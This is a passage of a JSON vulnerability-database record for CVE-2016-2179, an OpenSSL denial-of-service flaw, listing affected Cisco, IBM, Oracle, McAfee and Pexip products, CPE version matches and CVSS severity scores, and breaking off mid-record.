"vendor": "cisco", "version": "10" }, { "model": "expressway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "vm virtualbox", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "5.1.8" }, { "model": "small business series managed switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3.1" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.6" }, { "model": "telepresence system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "10006.1" }, { "model": "telepresence isdn gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32410" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3000" }, { "model": "series smart plus switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2200" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0.4" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v0" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.6" }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.1" }, { "model": "virtual security gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.2.4.1102" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.5" }, { "model": "telepresence tx9000 series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "project openssl 1.0.1j", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "project openssl", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "1.0.0x" }, { "model": "series digital media players", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "43000" }, { "model": "telepresence system series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "30006.1" }, { "model": "universal small cell series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70003.4.2.0" }, { "model": "unity connection", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.4" }, { "model": "one portal", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security manager", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.13" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.12" }, { "model": "ucs b-series blade servers", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "unified attendant console standard", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "security network protection", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.5" }, { "model": "telepresence integrator c series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.32" }, { "model": "enterprise content delivery system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.9" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "60000" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "mds series multilayer switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4300" }, { "model": "ucs standalone c-series rack server integrated management cont", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "-3.0" }, { "model": "ios and cisco ios xe software", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "16.1" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "4" }, { "model": "prime network", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence tx9000 series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6.1" }, { "model": "prime performance manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smart net total care local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "prime collaboration provisioning", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "connected grid routers", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "15.8.9" }, { "model": "network analysis module", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "commerce experience manager", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.5.2" }, { "model": "nexus series fabric switches aci mode", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "prime performance manager sp1611", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.7" }, { "model": "worklight consumer edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.12" }, { "model": "lancope stealthwatch flowcollector netflow", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.22" }, { "model": "unified ip phone 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "6901" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.23" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.16" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.10" }, { "model": "telepresence server and mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "701087100" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.2" }, { "model": "mds series multilayer switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "90006.2.19" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270015.5(3)" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-32" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.30" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.4" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql enterprise monitor", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "3.3.0.1098" }, { "model": "webex meetings for android", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "nexus series switches 5.2.8", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5000" }, { "model": "digital media manager 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "unified workforce optimization quality management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "telepresence integrator c series tc7.3.7", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.13" }, { "model": "spa122 analog telephone adapter with router", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "cloud object storage", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.5" }, { "model": "rrdi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.1" }, { "model": "project openssl 1.0.0h", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.2" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.14" }, { "model": "ios xr software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.3" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.4" }, { "model": "project openssl", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": "1.1" }, { "model": "unified intelligent contact management enterprise", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.2.4" }, { "model": "application and content networking system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.1k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "anyconnect secure mobility client for ios", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7.0" }, { "model": "ace application control engine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "47100" }, { "model": "oss support tools", "scope": "ne", "trust": 0.3, "vendor": "oracle", "version": "8.15.17.3.14" }, { "model": "anyconnect secure mobility client for mac os", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "x0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.2.1.2.0" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.4.1.2" }, { "model": "tivoli provisioning manager for images build", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.1.20290.1" }, { "model": "project openssl 1.0.0k", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.2" }, { "model": "prime infrastructure plug and play standalone gateway", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtual security gateway", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.1.6" }, { "model": "nexus series switches", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "50006.2.19" }, { "model": "telepresence conductor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.3" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "jabber for mac", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "8.1" }, { "model": "jabber for iphone and ipad", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.8" }, { "model": "prime network registrar", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.3" }, { "model": "cognos metrics manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "12.1" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "worklight enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.1" }, { "model": "telepresence video communication server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "connected analytics for collaboration", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.16" }, { "model": "series digital media players 5.4.1 rb4", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4400" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "multicast manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "aironet series access points", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "270016.3" }, { "model": "sterling b2b integrator", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "anyconnect secure mobility client for ios", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "secure access control system", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "5.8.0.32.8" }, { "model": "webex node for mcs", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence mcu", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.5(1.89)" }, { "model": "management appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "anyconnect secure mobility client for windows", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.0.7" }, { "model": "videoscape anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance ptz ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video distribution suite for internet streaming", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "4.003(002)" }, { "model": "project openssl 0.9.8s", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.31" }, { "model": "telepresence serial gateway series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence server on multiparty media", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8204.4" }, { "model": "i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "project openssl 1.0.2c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.13" }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.400" }, { "model": "unified ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "89610" }, { "model": "expressway series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "x8.8.3" }, { "model": "commerce guided search", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6.3" }, { "model": "prime network", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "431" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "unified attendant console enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified contact center express", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "small business spa500 series ip phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "vm virtualbox", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.0.26" }, { "model": "tivoli provisioning manager for os deployment", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.1" }, { "model": "network analysis module 6.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "telepresence system ex series ce8.2.2", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mxe series media experience engines", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "35000" }, { "model": "project openssl 1.0.2b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "universal small cell cloudbase factory recovery root filesystem", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "3.17.3" }, { "model": "videoscape control suite", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tandberg codian mse", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "ip series phones vpn feature", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8800-0" }, { "model": "mobilefirst platform foundation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.0" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.9" }, { "model": "security network protection", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1.3" }, { "model": "emergency responder", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.27" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.17" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.18" }, { "model": "enterprise manager base platform", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "13.2.0.0" }, { "model": "unified meetingplace 8.6mr1", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "email gateway", "scope": "ne", "trust": 0.3, "vendor": "mcafee", "version": "7.6.406-3402.103" }, { "model": "telepresence mx series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "tapi service provider", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "video surveillance series ip cameras", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70002.9" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "spa525g 5-line ip phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "telepresence profile series", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "secure access control system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6.22" }, { "model": "unified ip conference phone for third-party call control 9.3 sr3", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "8831" }, { "model": "unified ip series phones", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "79000" }, { "model": "spa232d multi-line dect analog telephone adapter", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "1.4.2" }, { "model": "nexus series fabric switches aci mode", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "9000-0" }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "virtualization experience media edition", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "12.3.2" }, { "model": "emergency responder", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "email gateway 7.6.405h1157986", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "project openssl 1.0.1l", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "registered envelope service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "universal small cell series", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "70003.5.12.23" }, { "model": "firesight system software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "smartcloud entry appliance fi", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.3.0.4" }, { "model": "webex meetings client hosted t32", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "mysql", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.7.15" }, { "model": "unified meetingplace", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "security virtual server protection for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "unified contact center express", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "11.6" }, { "model": "infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "tivoli provisioning manager for images system edition", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x7.1.1.0" }, { "model": "webex meetings server", "scope": "ne", "trust": 0.3, "vendor": "cisco", "version": "2.6.1.30" }, { "model": "project openssl 1.0.1h", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "email gateway", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.6.402" }, { "model": "project openssl 1.0.1p", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null } ], "sources": [ { "db": "BID", "id": "92987" }, { "db": "JVNDB", "id": "JVNDB-2016-004778" }, { "db": "NVD", "id": "CVE-2016-2179" }, { "db": "CNNVD", "id": "CNNVD-201609-103" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1t:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.2d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" }, { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:o:oracle:linux:6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:o:oracle:linux:7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2016-2179" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.", "sources": [ { "db": "CNNVD", "id": "CNNVD-201609-103" } ], "trust": 0.6 }, "cve": "CVE-2016-2179", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "impactScore": 2.9, "integrityImpact": "NONE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "Low", "accessVector": "Network", "authentication": "None", "author": "NVD", "availabilityImpact": "Partial", "baseScore": 5.0, "confidentialityImpact": "None", "exploitabilityScore": null, "id": "CVE-2016-2179", "impactScore": null, "integrityImpact": "None", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "Medium", "trust": 0.9, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "NVD", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "exploitabilityScore": 3.9, "impactScore": 3.6, "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.0, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0" }, { "attackComplexity": "Low", "attackVector": "Network", "author": "NVD", "availabilityImpact": "High", "baseScore": 7.5, "baseSeverity": "High", "confidentialityImpact": "None", "exploitabilityScore": null, "id": 